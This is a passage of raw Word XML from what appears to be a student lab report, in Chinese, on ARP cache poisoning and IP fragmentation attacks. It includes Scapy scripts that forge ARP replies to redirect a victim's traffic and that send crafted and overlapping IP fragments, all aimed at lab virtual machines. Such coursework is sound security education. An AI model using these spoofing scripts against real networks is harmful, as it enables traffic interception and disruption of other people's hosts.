    <w:p w14:paraId="3A9F25C0" w14:textId="14559C40" w:rsidR="00E07408" w:rsidRPr="00E07408" w:rsidRDefault="00E07408" w:rsidP="00E07408">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如图可知，虚拟机B的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地址1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.19.138</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在A的A</w:t>
      </w:r>
      <w:r>
        <w:t>RP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存中对应的M</w:t>
      </w:r>
      <w:r>
        <w:t>AC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址变为了M的M</w:t>
      </w:r>
      <w:r>
        <w:t>AC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，因此</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法可行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4637E0" w14:textId="5E2F7141" w:rsidR="009819B1" w:rsidRDefault="00E07408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578450B1" wp14:editId="54DA850F">
            <wp:extent cx="5274310" cy="3030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632D" w14:textId="77777777" w:rsidR="00E07408" w:rsidRDefault="00E07408" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5526EC4D" w14:textId="4ABBF873" w:rsidR="009819B1" w:rsidRDefault="009819B1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 w:rsidR="00E07408">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E61CCEA" w14:textId="4F2D0F3F" w:rsidR="00FE145A" w:rsidRDefault="00FE145A" w:rsidP="00FE145A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机M的代码为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAEC705" w14:textId="77777777" w:rsidR="00FE145A" w:rsidRDefault="00FE145A" w:rsidP="00FE145A"/>
    <w:p w14:paraId="58369326" w14:textId="4F7E6126" w:rsidR="00FE145A" w:rsidRPr="00FE145A" w:rsidRDefault="00FE145A" w:rsidP="00FE145A">
      <w:r w:rsidRPr="00FE145A">
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B80B12" w14:textId="77777777" w:rsidR="00FE145A" w:rsidRPr="00FE145A" w:rsidRDefault="00FE145A" w:rsidP="00FE145A">
      <w:r w:rsidRPr="00FE145A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE145A">
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE145A">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D8B73" w14:textId="77777777" w:rsidR="00FE145A" w:rsidRPr="00FE145A" w:rsidRDefault="00FE145A" w:rsidP="00FE145A">
      <w:r w:rsidRPr="00FE145A">
        <w:t>E = Ether(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE145A">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE145A">
        <w:t>='00:0c:29:1c:41:c3',dst='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE145A">
        <w:t>ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE145A">
        <w:t xml:space="preserve">') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242BB9C8" w14:textId="77777777" w:rsidR="00FE145A" w:rsidRPr="00FE145A" w:rsidRDefault="00FE145A" w:rsidP="00FE145A">
      <w:r w:rsidRPr="00FE145A">
        <w:t>A = ARP(hwsrc='00:0c:29:1c:41:c3',psrc='192.168.19.138',hwdst='ff:ff:ff:ff:ff:ff',pdst='192.168.19.138')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C830300" w14:textId="77777777" w:rsidR="00FE145A" w:rsidRPr="00FE145A" w:rsidRDefault="00FE145A" w:rsidP="00FE145A">
      <w:r w:rsidRPr="00FE145A">
        <w:t xml:space="preserve">pkt = E/A </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283743B9" w14:textId="6215CA34" w:rsidR="00FE145A" w:rsidRDefault="00FE145A" w:rsidP="00FE145A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE145A">
        <w:t>sendp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE145A">
        <w:t>(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FB205A" w14:textId="77777777" w:rsidR="00FE145A" w:rsidRPr="00FE145A" w:rsidRDefault="00FE145A" w:rsidP="00FE145A"/>
    <w:p w14:paraId="50F27A21" w14:textId="55151960" w:rsidR="00FE145A" w:rsidRDefault="00FE145A" w:rsidP="009819B1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283873D4" wp14:editId="4951306F">
            <wp:extent cx="5274310" cy="749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5B4F" w14:textId="7D97ED4B" w:rsidR="00FE145A" w:rsidRPr="00FE145A" w:rsidRDefault="00FE145A" w:rsidP="009819B1">
      <w:r w:rsidRPr="00FE145A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行M的code后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，A中</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的M</w:t>
      </w:r>
      <w:r>
        <w:t>AC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变为了M的M</w:t>
      </w:r>
      <w:r>
        <w:t>AC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，因此</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法成功：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4134F716" w14:textId="7DA22857" w:rsidR="00E07408" w:rsidRDefault="00FE145A" w:rsidP="009819B1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966DB1B" wp14:editId="2120AD39">
            <wp:extent cx="5274310" cy="1390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9B6" w14:textId="12E6D172" w:rsidR="00846D29" w:rsidRDefault="00846D29" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFDBC1C" w14:textId="3D0ED077" w:rsidR="001F4A28" w:rsidRDefault="001F4A28" w:rsidP="0033484C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I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>II.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4A28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F4A28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>IP/ICMP Attacks Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C602CEF" w14:textId="1AF1CC1E" w:rsidR="001F4A28" w:rsidRDefault="001F4A28" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="OLE_LINK5"/>
      <w:bookmarkStart w:id="5" w:name="OLE_LINK6"/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.a：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:bookmarkEnd w:id="5"/>
    <w:p w14:paraId="4F19C8C8" w14:textId="152E62D6" w:rsidR="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三次分片的代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEC840A" w14:textId="2A4FB685" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F923DE4" w14:textId="77777777" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485D0787" w14:textId="2F925BD9" w:rsidR="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA"/>
    <w:p w14:paraId="1CDA5ED6" w14:textId="576179AE" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一分片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F6AC9F" w14:textId="77777777" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=0,flags=1) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19491CCA" w14:textId="766B7D68" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve"> = UDP(sport=7070, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>=9090,len=</w:t>
      </w:r>
      <w:r w:rsidR="00074D21">
        <w:t>104</w:t>
      </w:r>
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">,chksum=0)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E240BC" w14:textId="77777777" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r w:rsidRPr="006540EA">
        <w:t>payload = 'A' * 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DA2D7D" w14:textId="77777777" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501DF94" w14:textId="53101057" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r w:rsidRPr="006540EA">
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EADDE0" w14:textId="18A3AFE7" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二分片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E9B30" w14:textId="77777777" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=5,flags=1,proto=17) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A45ED8" w14:textId="77777777" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">payload = 'B' * 32 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD77F93" w14:textId="77777777" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484614F3" w14:textId="77777777" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r w:rsidRPr="006540EA">
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439E935B" w14:textId="526AA220" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三分片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3587E52C" w14:textId="77777777" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA"/>
    <w:p w14:paraId="396F9E07" w14:textId="77777777" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:lastRenderedPageBreak/>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=9,proto=17) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0E529B" w14:textId="77777777" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r w:rsidRPr="006540EA">
        <w:t>payload = 'C' * 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6283B28A" w14:textId="77777777" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r w:rsidRPr="006540EA">
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006540EA">
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20833058" w14:textId="52A54A58" w:rsidR="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r w:rsidRPr="006540EA">
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21EC69" w14:textId="727734D5" w:rsidR="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA"/>
    <w:p w14:paraId="6232D486" w14:textId="297EE1DD" w:rsidR="006540EA" w:rsidRPr="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在另一台虚拟机上使用</w:t>
      </w:r>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ireshark进行抓包，可看到分别发过来的三个分片。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7D5DFC" w14:textId="03299634" w:rsidR="001F4A28" w:rsidRDefault="00074D21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6D740129" wp14:editId="5CBC34F6">
            <wp:extent cx="5274310" cy="278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900D" w14:textId="150F3042" w:rsidR="00C51908" w:rsidRPr="00C51908" w:rsidRDefault="00C51908" w:rsidP="0033484C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接收到的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51908">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报文内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E51895" w14:textId="18B20F04" w:rsidR="00C51908" w:rsidRDefault="00074D21" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01F6D4E0" wp14:editId="4ED54802">
            <wp:extent cx="5274310" cy="387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9944" w14:textId="51D1C4DB" w:rsidR="006540EA" w:rsidRDefault="006540EA" w:rsidP="0033484C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676E51CF" w14:textId="13CDA9F2" w:rsidR="006540EA" w:rsidRDefault="006540EA" w:rsidP="006540EA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Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.b：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFCF1DB" w14:textId="77777777" w:rsidR="00074D21" w:rsidRDefault="00C51908" w:rsidP="0033484C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先</w:t>
      </w:r>
      <w:r w:rsidRPr="00C51908">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设K=</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00074D21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BEB74C" w14:textId="0A621F50" w:rsidR="00074D21" w:rsidRPr="006F46B8" w:rsidRDefault="00074D21" w:rsidP="00074D21">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F46B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（1）实验</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F46B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006F46B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="006F46B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>overlapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7779E8C3" w14:textId="2A61747D" w:rsidR="006540EA" w:rsidRDefault="00C51908" w:rsidP="00074D21">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下，其中第二个分片的frag参数从5改为4</w:t>
      </w:r>
      <w:r w:rsidR="00074D21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，第二分片长度变为3</w:t>
      </w:r>
      <w:r w:rsidR="00074D21">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00074D21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00074D21">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00074D21">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00074D21">
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16615D5F" w14:textId="77777777" w:rsidR="00C51908" w:rsidRPr="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908"/>
    <w:p w14:paraId="013D9EF9" w14:textId="413B2E05" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908">
      <w:r>
        <w:t xml:space="preserve">#!/usr/bin/python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34085E3F" w14:textId="77777777" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908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40145BAC" w14:textId="77777777" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908"/>
    <w:p w14:paraId="680DB115" w14:textId="77777777" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908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="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=0,flags=1) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704F61D2" w14:textId="1F58B6C9" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = UDP(sport=7070, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=9090,len=</w:t>
      </w:r>
      <w:r w:rsidR="00074D21">
        <w:t>104</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,chksum=0)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3068A469" w14:textId="77777777" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908">
      <w:r>
        <w:t>payload = 'A' * 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39781202" w14:textId="77777777" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908">
      <w:r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udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A2ACA4" w14:textId="34430C99" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908">
      <w:r>
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C5C35A" w14:textId="77777777" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908"/>
    <w:p w14:paraId="55E4413D" w14:textId="77777777" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908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="192.168.19.143", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">="192.168.19.144",id=1000,frag=4,flags=1,proto=17) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A7B094" w14:textId="3F5174B4" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908">
      <w:r>
        <w:t xml:space="preserve">payload = 'B' * </w:t>
      </w:r>
      <w:r w:rsidR="00074D21">
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2DFB6D" w14:textId="77777777" w:rsidR="00C51908" w:rsidRDefault="00C51908" w:rsidP="00C51908">
      <w:r>
        <w:t xml:space="preserve">pkt = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
